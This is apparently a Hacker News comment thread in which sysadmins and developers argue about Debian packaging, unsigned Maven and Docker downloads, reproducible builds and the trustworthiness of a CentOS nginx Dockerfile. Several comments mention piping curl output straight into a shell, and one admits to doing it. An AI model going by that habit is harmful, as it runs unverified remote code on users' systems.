One thing that would help is if we didn't look at it as Programmers on one side of the fence and Sysadmins on the other. Programmers have problems to solve, and sysadmins have problems to solve, and maybe you can help solve each other's problems.

[1]: http://marc.info/?l=openssl-dev&m=114651085826293&w=2


I find it weird that you consider 'packaging' to be something a sysadmin should do, but 'building' to be something they should not do. Aren't they both forms of 'prepping code for use'?

And then state that you don't want your own software packaged. So, if a sysadmin is not allowed to build and not allowed to package, how are they supposed to get your code into production? "curl foo | sh"?


I don't consider packaging to be a sysadmin task. On any sane OS (i.e. anything not Linux/BSD), packaging is done by the upstream developers. That doesn't happen on Linux because of the culture of unstable APIs and general inconsistencies between distributions, but for my current app, I am providing DEBs and woe betide the distro developer who thinks it's a good idea to repackage things themselves ...


Well, we're going to have to agree to disagree there, because I think Windows packaging is fucking insane.

One of the things I loved about my move to linux and .deb land was that if I uninstalled something, I knew it was uninstalled. I didn't have to rely on the packager remembering to remove all their bits, or even remembering to include an uninstall option at all. Or rely on them not to do drive-by installs (which big names like Adobe still do, out in the open). And not have every significant program install its own "phone home" mechanism to check for updates. The crapstorm that is Windows packaging is a fantastic example of a place where developers love and care for their own product, but care not a jot for how the system as a whole should go together.


I read that the other way around. He specifically asks people to refrain from packaging his software. I think the implication is that he does want sysadmins to run his carefully constructed build scripts in order to install the application.


You really nailed it. Among my duties are systems administration for a company that works with a lot of software development vendors. We have a user acceptance team that makes sure that we get what we ordered, that the QC stays at a high level. So functional problems, that's their deal. But they're not sysadmins, they can't easily see what developer choices make administering the servers more complicated, more fragile, more expensive, or more insecure. This shifts my job from the end of the process (here, run this!) to the beginning (hey guys, let's use these tools instead, it'll make everyone's lives easier).

As such I'm very pro containers as they will eliminate a ton of deployment effort and allow me to manage different environments much more easily. But it means that there needs to be a much bigger magnifying glass on the container contents early in the process as opposed to the moment of deployment.


> The value of debian is not that they package (or repackage) everything into deb files but that they resolve versioning and dependancy conflicts, slip security fixes into old versions of libraries (when newer version break API/ABI), and make it possible to integrate completely disparate software into a system.

Maven has exactly the same capabilities as deb does - you can depend on versions, depend on a range of possible versions, exclude things that conflict and so forth. And it puts even more emphasis on fully reproducible builds (with the aid of the JVM) - in that respect it's closer to nix than apt.

> But the sysadmin does feel responsible. He is responsible for the decisions you make, so if you seem to be making decisions that help him (like making it easy for you to get your software into debian) then he finds it easier to trust you. If you make him play whackamole with dependencies, and require a server (or a container) all to yourself, and don't document how to deal with your logfiles (or even where they show up)

Wow, self-important much? Too many sysadmins seem to forget that the system exists to run the programs, not the other way around.

> If you make him play whackamole with dependencies, and require a server (or a container) all to yourself, and don't document how to deal with your logfiles (or even where they show up), how or when you will communicate with remote hosts, how much bandwidth you'll use, and so on

On the contrary, maven makes the requirements much simpler. I have literally one dependency, a JVM, so it can run on any host you like (no need to worry about shared library conflicts with some other application). It needs to download one file (shaded jar) from our internal repo, and execute one command to run it. That's it.

> That's what Maven is. It's a surprise box that encourages shotgun debugging and using ausearch features to do upgrades.

No, it's just the opposite. All the dependencies and project structure are right there in declarative XML. It's what make should have been.


> No, it's just the opposite. All the dependencies and project structure are right there in declarative XML. It's what make should have been.

When make was written most machines would have just exploded at the sight of a typical build.xml, and downloading tens or hundreds of packages from anywhere was simply out of the question.

Also, 'dependency' means something completeley different in make as opposed to maven - I don't think modern build systems do even care much for make-style deps.


> When make was written most machines would have just exploded at the sight of a typical build.xml, and downloading tens or hundreds of packages from anywhere was simply out of the question.

Sure. But the notion of doing things declaratively existed (Prolog predates make by five years). And the biggest difference between make and the scripts that preceded it is that it's more structured, with a graph of targets rather than just a list of commands.

If you add the ability to reuse libraries of targets (something that sort-of exists via implicit make rules), restrict targets to something a little more structured than random shell commands, and - yes - add the ability to fetch dependencies (including target definitions) from a repository, you end up with something very like maven.


> The value of debian is not that they package (or repackage) everything into deb files but that they resolve versioning and dependancy conflicts, slip security fixes into old versions of libraries (when newer version break API/ABI), and make it possible to integrate completely disparate software into a system. They also have a great track record at it.

In the HStack world, the analog of the aspects of Debian you're talking about here is companies like Cloudera, who, surprise, make their stuff available as debs and PPAs.

Building your own Hadoop from source and complaining that the resulting product is unvetted is sort of like doing a git pull of all the Linux dependencies and building that.


But the problem is that the ones doing the vetting (i.e. Debian) have given up on making a vettable distribution because the build is so broken.


But Debian isn't the Debian of Hadoop. Cloudera is.

Why should we assume the Debian Foundation is the sole trusted source of every type of software?


What you are saying makes no sense.

And yes, if I'm using Debian and didn't add any PPA or extra sources, then the Debian Foundation IS the sole trusted source of software. And you do that because you know they won't fuck up the system, which (and that's the whole point of this thread) the others certainly don't.

Now Debian is telling you: we see no way to distribute this software and guarantee what you are getting or that it won't fuck up the system.

Do you think I'd consider installing that junk?


So everyone who runs Hadoop is installing junk? Seems like plenty of other companies have been able to build businesses on it without adhering to your Debian-only rules...


Signed packages isn't about just being signed.

I could sign anything I like, but that doesn't make it any more secure for you to curl it into /bin/bash.

Signatures are about who signs it, and that's not something mvn has solved at all. Mvn is a free-for-all of binary code that very well could own my system, whereas debian is a curated collection of software which the debian maintainers have signed as being compiled by their systems with no malign influence and having met at least some bar.

I'd trust foo.jar signed by debian over foo.jar signed by bobTheJavaBuilder@gmail.com any day... and mvn only gives you the latter.

So yeah, sure, they're signed, but it doesn't actually matter if you don't take the time to hook into the chain of trust (and believe me, mvn does not ask you to trust your transitive jar dependency 50 down the line) or have a trusted third party (debian) do their own validations.


> whereas debian is a curated collection of software which the debian maintainers have signed as being compiled by their systems with no malign influence and having met at least some bar.

And not only that, by shipping the source and requiring that binaries can be built from the source, who signs it is no longer blind trust. Others can audit it.

Reproducible builds should improve this even further.


> whereas debian is a curated collection of software which the debian maintainers have signed as being compiled by their systems with no malign influence and having met at least some bar.

This comes with a huge tradeoff, and I guess it's that tradeoff that makes developers like myself opt to sometimes even pipe the cURL to bash. I almost never download any software I actually plan to use through official system repositories, because whatever comes out of apt-get, it's almost always two years behind the last release and missing half the features I need. Sure, I'll apt-get install that libfoo-dev dependency, because I don't care what version it is as long as it's from the last decade. But for any application I actually need to use, it's either git repo or official binary download.


> whatever comes out of apt-get, it's almost always two years behind the last release and missing half the features I need

As a sysadmin, I love that, but I've had to come to terms with the fact that some developers have the attention span of hummingbirds who had Cap'n Crunch for breakfast ("two years old" is still very new software from an administration perspective).

So, I've basically accepted the fact that whatever stack the developers use I'll build and maintain directly from upstream -- with the price being that the version and extensions/whatever used are frozen from the moment a given project starts.


"Small jars that do one thing well. "

Oh, the "unix" philosophy.


Who can't read a Makefile? Who can't at least read the output of make -n? It's terrifying to me that you're suggesting that people can't and don't.

It's not even a security thing. I've had poorly-written Makefiles that would have blown things away thanks to an unset variable on a certain platform, for example.


> Who can't read a Makefile? Who can't at least read the output of make -n? It's terrifying to me that you're suggesting that people can't and don't.

Can I read a Makefile? Sure. But 90%+ of Makefiles these days are 12000-line automatically generated monstrosities. It's not worth my time to open the Makefile in a text editor on the off chance that it isn't, and I'd be amazed if many people did.

make -n you can do I guess. But unless you're also auditing all the source code I'm not sure there's a lot of value in it.

> It's not even a security thing. I've had poorly-written Makefiles that would have blown things away thanks to an unset variable on a certain platform, for example.

Yep. Maven doesn't do that.


At my last job we used a micro-service architecture on AWS (EC2 and RDS). Using Ansible playbooks for various types of servers and roles for each service, we created a new server instance every deploy. All servers were running FreeBSD and using daemontools to control services. For testing, hotfixes, and manual checking of logs, it was easy to complement with manual ssh. We kept the old and new instances around in case something went wrong. Ansible is just a thin layer on top of shell scripts, and reasonably straightforward to understand and parameterize. It worked wonderfully in most cases (the possible exception being the build server, because of shared libraries and a complex workflow with git pull/trigger, but I don't think that was the fault of the overall architecture).

That said, I agree that sbt is an abomination and doesn't lend itself to a sane and secure workflow, unfortunately.

http://martinfowler.com/bliki/PhoenixServer.html

http://www.ansible.com/


I also learned from a place with good practices, which used daemontools to run services and a custom deploy system in bash and python which actually did the right kinds of things. (and I was fully-manually admin-ing my own linux systems for years before that)

As an early employee at a new place, I'm now using ansible and docker because nowadays people want to use that stuff, and it is a lot faster to get started with than writing a new proper deploy system from scratch.

But I build all the docker images we use and version them with the date. I also don't use ansible roles from ansible-galaxy, and I don't even organize tasks into roles, just into task-include files. Our ansible tasks use bash helper scripts wherever necessary to do things the right way, because the built-in modules are often too granular / not connected enough to fully check state. I also replaced the docker plugin for ansible, to manage state a bit better. So overall it's not too bad.

I guess my point is that, having done it all from-scratch first, using some of the modern automation stuff isn't too bad. But you have to know what not to use. People new to "devops", using all the fancy stuff now available, who didn't have the introduction I did... it's not surprising they end up in a mess and don't even recognize it.


This is the key. The OP's major complaint is with prebuilt containers from potentially untrustworthy sources, but he passes this off as a fundamental problem with containers themselves.

The reality is that you can (and probably should) build your own container rather than using a public one from docker hub. You know exactly what is in it, and can trust it completely.


In reality a dev will pass a prebuilt and non-updatable container to the sysadmin, though. So the OP is exactly right! It doesn't matter where it's coming from if you can't verify, rebuild or update it.


sbt is an abomination, but unless you're in the library business you can just use maven, which is wonderful.


I love a good rant as much as the next guy, but unfortunately, rants are rarely actionable.

> Maven, ivy and sbt are the go-to tools for having your system download unsigned binary data from the internet and run it on your computer.

The root of the problem is that out of the total number of libraries available in language X, only a small subset is packaged in Debian/RHEL. This may be more egregious with large, Java enterprisy software, but you could easily end up with the same problem in Ruby or Python.

You cannot reasonably expect developers to package and maintain all their dependencies properly. The least bad solution would be to:

- still use maven to manage dependencies

- create a Debian/RHEL package incorporating the dependencies (effectively vendoring them in the package)

Unfortunately, it is not that simple, because you need to make sure that your vendored-in-the-package dependencies are somewhere where they will not conflict with another package with the same idea and the same dependencies (or better, the same idea and a different version of the same dependencies). Which means you need to keep them out of /usr/share/java and make sure the classpath points at the right location.

However, it seems that developers tend to avoid this kind of rigmarole and instead go for the "install dependencies as a local user" approach for certain classes of application (eg, webapps) because packaging is not fun.
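
One way to square that circle (names below are made up, purely to illustrate the layout) is to keep the vendored jars under the application's own prefix and point at them from a packaged wrapper script:

    #!/bin/sh
    # /usr/bin/myapp, installed by the package; the vendored jars live under
    # /usr/share/myapp/lib rather than /usr/share/java, so they can never
    # collide with another package's copies of the same libraries
    APP_HOME=/usr/share/myapp
    exec java -cp "$APP_HOME/myapp.jar:$APP_HOME/lib/*" com.example.Main "$@"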


Maven packages aren't actually unsigned either. They're downloaded over SSL and to get into Maven Central you need to sign with a GPG key.

The problem is that you normally cannot find a path to the developers through the web of trust, of course, but that's not Maven's fault. That's the fault of the web of trust (more accurately called "handful of strings of trust").

Debian/Red Hat code signing doesn't prove very much either. All it proves is that the package came from Debian or Red Hat. But did they modify the software along the way, doing some kind of MITM attack on the upstream developers? Quite possibly! At least with Maven you don't have that problem.


> The problem is that you normally cannot find a path to the developers through the web of trust, of course, but that's not Maven's fault.

It is Maven's fault. Debian could have taken the same approach, but instead they have decided to vet prospective developers for a few years, and use one signing key for package indexes.

As a result, in Debian:

- It is feasible to actually check packages, because you don't need a large WoT.

- You know that the maintainer of a package was at least vetted for some time before they could put anything in the archive.

With Maven:

- It's infeasible to check the signatures, since nearly no one has a complete enough WoT.

- Anyone can submit a library, no vetting necessary.

- Maven does not check signatures by default.

So, basically the only thing you can do in Maven is hand-pick a small set of libraries. Verify them in some way and stick to specific versions, putting their checksums in your POM. Unfortunately, as the article already touches upon, too many Java libraries pull in half of the internet, so it may not be very practical.


> It is Maven's fault. Debian could have taken the same approach, but instead they have decided to vet prospective developers for a few years, and use one signing key for package indexes.

Yes. But this creates a much higher barrier to entry. As usual, it is a trade-off, but it is obvious that with a Debian-like system, the number of packages on Maven/CPAN/Pypi/Rubygems would be considerably smaller.


> You cannot reasonably expect developers to package and maintain all their dependencies properly.

I think that this is a good point, but it all comes down to quality control.

You wouldn't accept a new dependency into your project if it is buggy or has a bad API.

So why is bad packaging, a hacked-up build system or inability to build from an auditable source considered acceptable in many communities today?


I don't think that's acceptable, but ranting and ignoring the underlying issue doesn't help.


> You cannot reasonably expect developers to package and maintain all their dependencies properly.

Why not? This is exactly what developers are expected to do. Every developer must manage dependencies for their application to work.

What you mean is they can't be reasonably expected to do it well.

In most situations, this is truly a trivial amount of investment relative to the overall cost of developing and maintaining an application.

There are ecosystems which make the task easier or more difficult/annoying, but that cost should be accounted for when choosing which development platform to use.


> In most situations, this is truly a trivial amount of investment relative to the overall cost of developing and maintaining an application.

I wouldn't say that creating and owning packaging for, say 50 libraries (assuming you only deploy to a single platform) represents a "trivial amount of investment" for a standard small developer team.


Honestly, if a particular development environment for a project required tracking 50 libraries not supported by any distro community and my development team was so small that I couldn't do that in a sane manner...

I might reevaluate the suitability of that particular language for the project.

As an aside, it only takes marginally more time to build a package for a distro than it does to build the software by itself. If you've already got the build done, 3 experienced guys could knock out 50 packages in a week. Inexperienced (in this task), but competent, devs should be able to do it in 2 weeks.


    > You cannot reasonably expect developers to package and 
    > maintain all their dependencies properly.
What? With appropriate tooling, of course you can.


I don't know any tooling that turns (recursively) a Maven pom file into a Debian repository of Debian policy-abiding .debs, which are magically updated when the pom file changes.


If you mean Debian policy-abiding in the sense of "signed by a Debian developer in the Debian WoT" then no, but that's not something you could ever do automatically. But for the rest, I've done all the individual pieces before: it is trivial to generate a .deb from a maven pom and put it in a debian repository, it's trivial to do some operation on all the dependencies of a maven project, and it's trivial to hook something into a maven repository to happen whenever a new artifact is uploaded. You absolutely could do this if you wanted to, and it wouldn't be more than a few days' work.

(Of course it wouldn't provide any value, which is why no-one does it).


If they are not public, that's obviously not the same thing, though you're still going through a lot more complexity than "here is this .war, put it on the server and reload the webapp".


"Stack is the new term for "I have no idea what I'm actually using"." - this made my day!


Same for "framework" which is: I have no idea what I'm doing


Sometimes yes, but sometimes you started writing CGIs in C, then Perl, then you wrote your own microframework, then you decided to use a standard one. This has been my evolution, and even if I don't understand everything inside the frameworks I'm using now, I have a general idea. And furthermore, what can we do about it? Writing code from scratch or maintaining our own frameworks is more or less the way to lose customers, unless you are a Facebook and you can engineer and push a React.


If more people went through that process, the frameworks we have might be fewer and of better quality.


Judging by the sheer number of frameworks we have, everyone who went through that process actually ended up writing one, or five.


That sounds like where I am coming from. Looking at Django questions on Stack Overflow, a lot of people don't.


Thank you for this. I hate the "frameworks are for people who don't know what they're doing!" meme. Sometimes they're just for people who have thought about the trade-offs and decided a popular framework has many advantages.


Same goes for 'abstraction', it hides the essence of what is happening. Therefore every abstraction is evil.


Hopefully this is sarcasm. Code without abstraction can also very efficiently hide what is happening by having a disastrous signal-to-noise ratio, combined with all the potential for errors you get when repeating the same pattern many times.


Code is abstraction. With no abstraction you have to build your systems with lots of nand gates and a clock.


Abstractions are necessary to write software, unless you speak binary code, so calling them evil is a bit hyperbolic. My point is at some level you have to trust the abstractions of a system or else nothing would get done. That doesn't mean you shouldn't have a conceptual understanding of the lower levels, but they aren't evil!


It's possible to use abstractions that aren't inversions or leaky. Practically no one does a good job of it, so you are correct in practice and experience, although in theory it is possible and sometimes people do pull it off successfully.

http://en.wikipedia.org/wiki/Abstraction_inversion

http://en.wikipedia.org/wiki/Leaky_abstraction


I think you should strive to understand what is happening under the abstraction, but abstraction is a useful tool. It's a bit like calling something a "crutch". Sounds bad, but what if you have a broken leg? Crutches allow you to get over the problem and make progress. I have to write software that runs on any hardware from any number of vendors and multiple operating systems. Not using abstractions would destroy my effectiveness.


How are people missing the sarcasm of this comment?


Programming languages are for lazy people who don't like flipping switches to code assembly by hand.


"Framework" at least pretty reliably means some form of code generation is going on.


I was doing sysadmin the "right way" a long, long time ago, and I don't see much difference. Maybe the author regularly does full audits of the source code of every package he downloads, and of course disassembles every executable and library in the underlying OS, but most of us don't. There's no wisdom or security to be gained from the act of running "make", much less "make install".


>> Maybe the author regularly does full audits of the source code of every package he downloads, and of course disassembles every executable and library in the underlying OS, but most of us don't.

This is not the point being made. Trust is often offloaded, say to the debian people, but it is present in most modern linux systems as a basic part of the setup.

>> There's no wisdom or security to be gained from the act of running "make", much less "make install".

'make' is brought up not because everyone should be running "make" or "make install", but because it's a standard and it is understood by many people. It's brought up in the context of hadoop because the hadoop build system appears to be just so complicated and non-standard, including pulling in untrusted sources from all over the place, that it is near impossible to set it up as a well-audited, standardised package.

Given this, it is likely to be a hive of vulnerabilities, either during the setup phase (if any of the third party servers gets compromised or MITM'd) or during deployment (that java VM it pulled in during setup is never going to get patched).


There's a huge difference.

> Maybe the author regularly does full audits of the source code of every package he downloads, and of course disassembles every executable and library in the underlying OS, but most of us don't.

What matters is that the source code is auditable. It only takes one person to investigate something suspicious, raise a flag and get it fixed.

This is certainly still true for Debian - not being able to build from source is considered a release blocking bug.


Assuming you:

- trust your compiler and linker

- trust your tar extractor / package manager / whatever

- trust your editor

- trust your http library (or whatever you used to download/distribute the code)


It comes down to trusting two key things. Trusting your initial distribution download (which contains the package signing keys), and trusting the toolchain (in a Reflections on Trusting Trust way).

But the deeper you go, the harder it is for malicious code to reside there. In theory it's possible, but in practice I'd like someone to show me some code somebody could have written into the toolchain a decade ago, without hindsight, which could still exist today.

Whichever way, it's clearly far tougher for a malicious actor to compromise a system by injecting something into a distribution ecosystem than it is to inject a signed-by-unknown-reputation binary-only package into the Maven ecosystem.


>> - trust your http library (or whatever you used to download/distribute the code)

This can be overcome with signing.

We're all well aware of how deep this rabbit-hole goes, however that doesn't mean that it's a good idea to throw all trust away.


This is where reproducible builds [0] come in. We can trust our binaries much more if the same build inputs yield the same build output.

Building on that, could we find a fixed point where the OS builds the exact same bootstrap binaries that were used to bootstrap the OS to begin with? [1] That would give us even more confidence that the binaries we're using are as they should be. Interesting place for experimentation.
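
The property is also easy to check mechanically: build twice from a clean tree and compare hashes (build command and artifact name are placeholders):

    ./build.sh && sha256sum output.bin > first.sha256
    git clean -xdf && ./build.sh
    sha256sum -c first.sha256   # fails if the second build differs bit-for-bit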

[0] https://reproducible.debian.net/reproducible.html

[1] https://gnu.org/software/guix/manual/html_node/Bootstrapping...


Trust isn't binary. It's a scale of weighted risks.


> There's no wisdom or security to be gained from the act of running "make", much less "make install".

You were not doing sysadmin right. DESTDIR and checkinstall are two vital tools that grew out of the mistakes of bare make/make install.
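
e.g., for a build whose Makefile honours DESTDIR (paths are illustrative), you stage the install instead of letting it scatter files over the live system:

  ./configure --prefix=/usr
  make
  make DESTDIR=/tmp/stage install     # files land under /tmp/stage, not on the live filesystem
  sudo checkinstall --install=no      # or wrap "make install" into a trackable .deb/.rpm instead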


The contract between operations and dev (as concepts, not as people) is in need of renewal.

To my mind, that was what "devops" was supposed to be, but it's been a bit of a dogpile in the years since the term gained popularity.

Systems are opaque to most developers, and many developers wish to make their software opaque to the system on which it runs. This is a failure on behalf of our entire profession, not any one group.

Infrastructure software is in a bit of a renaissance period, but it's very early days. Packaging software is a total mystery to most developers. I don't even need to back that up with examples: most of us can recall the last time we came across a well-packaged piece of software with joy, due to its sheer rarity. I'd be very surprised to find the average age of a Debian maintainer was trending anything but upwards, and steeply.

Containers are being misused, but that's because the alternatives we've been building for ourselves have not kept up with the strong user experience narrative of web and mobile software.

We need to do better.


It would be nice to have a well known 'devops manifesto'. I google'd it and came across this: https://sites.google.com/a/jezhumble.net/devops-manifesto/. Which I think is actually pretty decent - the emphasis on cross functional product teams, for instance.

In my mind, that is largely what devops is about - team ownership of the entire product, which includes infrastructure. Instead of having a silo'd 'ops' team writing ansible scripts and doing deployment, this should be part of the team (which could mean having an opsy guy on the team).

Anyways, as it pertains to containers, I think containers are more a practice than a principle. It tends to happen naturally when you want reproducible builds and continuous delivery. It's not really about making software opaque to the system, imo, but rather making your product artifacts reproducible (if you rely on running ./configure; make at deploy time, you never know what you'll end up with since dependencies are dynamically determined).



This 1 page poorly titled wrong rant is the #2 story on this site?

"Ever tried to security update a container?" lol. you are doing it wrong.

"Essentially, the Docker approach boils down to downloading an unsigned binary, running it, and hoping it doesn't contain any backdoor into your companies network." nope https://blog.docker.com/2014/10/docker-1-3-signed-images-pro...

"»Docker is the new 'curl | sudo bash'«" no it's not. most intelligent companies are building their own images from scratch.

People that care about what's in their stack take the time to understand what's in there & how to build things.


I think you're wrong. I think most users are not installing trusted builds from their OS vendors. Piping curl to bash is incredibly common--many popular software packagers are doing it [1].

About a year and a half ago, I was playing around with Docker and made a build of memcached for my local environment and uploaded it to the registry [2] and then forgot all about it. Fast-forward to me writing this post and checking on it: 12 people have downloaded this! Who? I have no idea. It doesn't even have a proper description, but people tried it out and presumably ran it. It wasn't a malicious build but it certainly could have been. I'm sure that it would have hundreds of downloads if I had taken the time to make a legit-sounding description with b.s. promises of some special optimization or security hardening.

The state of software packaging in 2015 is truly dreadful. We spent most of the 2000's improving packaging technology to the point where we had safe, reliable tools that were easy for most folks to use. Here in the 2010's, software authors have rejected these toolsets in favor of bespoke, "kustom" installation tools and hacks. I just don't get it. Have people not heard of fpm [3]?

[1] http://output.chrissnell.com/post/69023793377/stop-piping-cu...

[2] https://registry.hub.docker.com/u/chrissnell/memcached/

[3] https://github.com/jordansissel/fpm


It appears this was finally changed in mid-March, but after its initial release in December, image signing worked as follows:

Docker’s report that a downloaded image is “verified” is based solely on the presence of a signed manifest, and Docker never verifies the image checksum from the manifest. An attacker could provide any image alongside a signed manifest.

https://news.ycombinator.com/item?id=8788770

https://titanous.com/posts/docker-insecurity

https://github.com/docker/docker/issues/9719

edit: add hn discussion, github issue.


So much truth in this.

We've been doing some work with Elastic Beanstalk lately, and - while it certainly does one or two things that are extremely clever and useful - in the end it just feels like this bizarre mix of complete magic and incredibly convoluted arcana. Everything feels very out of our control and locks us into an ecosystem that considerably limits our choices and flexibility (unless we invest the time in becoming experts in EB, which really isn't particularly something we have the time for). And, as the author of this post says, the security ramifications, while orthogonal, are also deeply troubling.


    This rant is about containers, prebuilt VMs, and the incredible mess they cause because their concept lacks notions of "trust" and "upgrades".
Prebuilt VMs? Sure, I wouldn't touch them except for evaluating a project, and for commercial software you may not have a choice.

But docker containers at least usually provide a Dockerfile that describes exactly how a binary image is built. You just clone the source repo, audit the few lines of build commands, and then build into your own private registry. It requires hardly any more trust than following the instructions in a README or INSTALL. Just because fools are pulling down pre-built images and running them in their datacentre doesn't mean that's the way you should do it. And the problem with 'old-school' sysadmins is they are often far too quick to reject new practices, citing tired excuses based on misunderstandings of the technologies.
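
Something along these lines (repository URL, registry host and tag are placeholders):

  git clone https://github.com/someorg/someimage.git && cd someimage
  less Dockerfile                                     # audit the build steps yourself
  docker build -t registry.internal:5000/someimage:1.0 .
  docker push registry.internal:5000/someimage:1.0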

    Ever tried to security update a container?
Yeah I have. It's easy if you have already built your 'stack' to scale horizontally (which means you have at least 2 or more of everything in a HA or LB config). You rebuild against a fully patched base-OS container, spin-up, send some test load to it & validate, then bring into service. Repeat for rest of nodes at that tier.
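
Roughly like this (image names, port and smoke test are illustrative):

  docker pull centos:centos7                    # pick up the patched base image
  docker build -t myapp:patched .               # Dockerfile starts with FROM centos:centos7
  docker run -d --name myapp-canary -p 8081:80 myapp:patched
  curl -fs http://localhost:8081/ && echo ok    # validate before it takes real traffic
  # then add it to the LB pool and retire the old containers one node at a time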

If you are trying to be an old-school sysadmin that expects to console or SSH in and run 'yum upgrade' or 'apt-get upgrade' your containers then you are doing containers wrong...


then you are doing containers wrong...

The old-school sysadmins I know scoff at Docker's idea of 'containers'. Linux containers were already a thing, and don't need an entire copy of an OS ported around with them. To them, containers are a way of enveloping a process to limit it, not a way of distributing packaged software. They may or may not be doing 'docker' right, but they certainly know what 'linux containers' are.


Well I should have qualified it with 'docker containers'. But yeah, those that have been around long enough in Linux container land have all dealt with vserver, openvz, lxc, etc, and all of those carried around this 'entire copy' of an OS, per container (ignoring vserver's vhashify). Docker helps you to spin up N containers running all sorts of applications based on the single master image.

Docker, whether your view is good or bad, brings something more than just another container implementation to the table...


> Linux containers were already a thing, and don't need an entire copy of an OS ported around with them.

Neither do Docker containers. You can build off scratch and put the literal bare minimum you need in it. I've done it a few different times. It's rarely done because the payoff rarely justifies the time and effort, but if your old-school sysadmins are scoffing, that's on them.
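
A minimal sketch, assuming a statically linked binary (names and port are illustrative):

  FROM scratch
  COPY myservice /myservice
  EXPOSE 8080
  ENTRYPOINT ["/myservice"]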


Response to exactly that idea from one of these guys: "Why do you need docker to just build an executable?"


Deterministic builds. Isolating shitty build scripts from my system.
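
e.g. run the build inside a throwaway container so its scripts never touch the host (the image name is a placeholder for whatever toolchain image you trust):

  docker run --rm -v "$(pwd)":/src -w /src build-toolchain-image make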


I don't. But it helps make a straightforward deployable of highly coupled libraries and tools in a way that's more comprehensible to other people.

But I'll get off your lawn now.


Ain't my lawn; I consider myself a mid-range sysadmin. I stepped out of support and into sysadmin land about 4 years ago. But I know some 'from-the-birth-of-linux' guys, who live and breathe this stuff in a way I never will. When I get home from staring at terminals, I want to watch movies and play video games, not swear at something on a breadboard :)


> If you are trying to be an old-school sysadmin that expects to console or SSH in and run 'yum upgrade' or 'apt-get upgrade' your containers then you are doing containers wrong...

A container is a chroot environment for running a service. Basically. It's perfectly possible to 'yum upgrade' or 'apt-get upgrade' them.

I think what you're trying to say is this is a bad idea because containers are not supposed to be managed individually. The magical fluffy dream of Docker is to never have to manage another individual OS again; just make one image, then kick it out to all your machines and make them use the new image. No resolving dependencies, no verifying individual file checksums, no upgrading or downgrading or conflicting different package versions for every server and service. Just do it once, and then push it out everywhere, and everything magically works.

Right?

Here's the thing: Containers don't do away with the idea that a developer might use a totally bleeding-edge piece of software to update one of your many apps, and that you may end up with multiple incompatible versions of software on your systems. In fact, Docker kind of trades on that as a feature. "Install any shit software you want and it'll never conflict with other containers!" But this lie is shown for what it is once you start looking at containers as individual physical machines.

Back in the day we had to 'yum install some-specific-architecture-and-version-of-this-package' on a particular machine to make that machine serve that software. You do the same with Docker, because you have a particular Docker container with a specific version of the package, and all the other packages and OS requirements in that container. You still have a one-off machine to install, maintain and troubleshoot. The only differences are it isn't physical anymore, and you perform updates on the image, not on the machine.

Just like you ended up with a machine (or three machines) with three different versions of BDB, you end up with three containers with three different versions of BDB. Instead of using 'apt' or 'yum' to install them, you write their Dockerfiles and build them, test them, then roll out their updated images. You do a lot more from scratch now because a Linux distro hasn't done the work for you, and so you also run into all the headaches that someone packaging software for a Linux distro usually runs into.

One of the worst things about the 'new devops way' seems to be the non-reproducibility of things like Dockerfiles. To build a Docker image we slap together whatever bleeding-edge files we had on date X-Y-Z, and whatever comes out at the end is considered 'production'. Ignoring the patches, the quality control, the stable released software distributed by distributions on reliable mirrors, and generally without tuning the software at all for the particular system you're running it on. Try to build that Dockerfile again in a year and suddenly it doesn't work the same as it used to, or a bug magically appears on your production system, or you have to apply a patch and now you need to unroll all the commands used for individual stages of the build process for a single package and figure out how to make it still work like the original was built, etc.

Containers by themselves are fine things to use. The problem is how they've effectively sold a lie to everyone that uses them: that there is no sysadmin work to be done. That don't worry, Mr. Javascript Dev, you too can build infrastructure and deploy it without learning the many lessons and best practices of an industry that has been here longer than you've been alive.

This wouldn't even be far from the truth if it was, say, a RedHat-built set of container images, or a Debian-built set of container images. Then at least there'd be an expert who's building software in a reliable uniform way and along a particular standard. They would provide you the software updates, and even provide you with tools and instructions on how to use them to manage your whole software infrastructure without having to write software yourself.

In the age of 'everyone should learn to code', everything can be fixed by writing more code, and copy-and-pasting binaries built on a developer's desktop counts as production deployment. [To be fair, developers were doing this 10 years ago with Java apps, and we hated it]


I corrected myself in my reply to the other person; I meant '[..] upgrade your docker containers'. I heavily use LXC containers (and had used openvz and vserver before that) and treat them as individual servers.

All your points about bad sysadmin practices are OS & container agnostic - they can happen on any platform, don't drag Docker into it. Sure there is a culture of 'docker run somebinaryimage [..]' but those people are the ones that do "curl | sudo bash" as well.

Your claim about non-reproducibility of Dockerfiles is bogus. The result of a Dockerfile build gives you precisely the reproducibility you desire. Every time you run a container from that image built from a Dockerfile, you'll get the same filesystem & environment.

Docker 1.6's "Content Addressable Image Identifiers" addresses your build in a year concern by allowing dockerfiles to refer to a digest to ensure you are building against exactly the image you expect (rather than the result of some build process that yum -y upgrades etc, which I think is what you were getting at).


docker can totally be dragged into this. they keep selling the lie and encouraging most terrible practices and design. talk about self inflicted...


> Every time you run a container from that image built from a Dockerfile, you'll get the same filesystem & environment

The image (and thus container) are the same. Trying to rebuild it from scratch leaves it not the same, typically because the way people put together Dockerfiles and build images does not follow a standard. And it has to do with the container culture.

Let's take a Dockerfile for the CentOS 7 version of nginx (https://github.com/CentOS/CentOS-Dockerfiles/blob/master/ngi...)

  FROM centos:centos7
  MAINTAINER The CentOS Project <cloud-ops@centos.org>
  
  RUN yum -y update; yum clean all
Right off the bat I think: what the hell? Why are they doing a yum update? A yum update today may very well leave the system in a completely different state than a year ago. There's likely been some package updated in that time, which changes the state of the system. Right off the bat we're screwed.

  RUN yum -y install epel-release tar ; yum clean all
  RUN yum -y install nginx ; yum clean all
And what the hell is this?! There's no version, no build, no checksum. What the hell did we just install? If those packages change in a year, we're screwed. Not to mention 'epel-release' and 'tar' should be set as dependencies somewhere, and the type of dependencies too.

  ADD nginx.conf /etc/nginx/nginx.conf
  RUN echo "daemon off;" >> /etc/nginx/nginx.conf
Oh, cool, just use whatever the hell this config is which may or may not be different from the one that shipped with the original package. And let's just modify it for no apparent reason, too. And definitely make sure we have no way to know what version of that file we're using for this image. Lovely.

  RUN curl https://git.centos.org/sources/httpd/c7/acf5cccf4afaecf3afeb18c50ae59fd5c6504910 \
      | tar -xz -C /usr/share/nginx/html \
      --strip-components=1
The hell? We're pulling some random git sources from a git server which i'm willing to bet has no standard mirrors? On closer inspection it doesn't really look like a git server, but a host named git which hosts files whose names are a checksum, though we don't know where this is from or what exactly it refers to. If this server or file disappears, good luck knowing what in hell was being downloaded here.

  RUN sed -i -e 's/Apache/nginx/g' -e '/apache_pb.gif/d' \ 
      /usr/share/nginx/html/index.html
  
  EXPOSE 80
  
  CMD [ "/usr/sbin/nginx" ]
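
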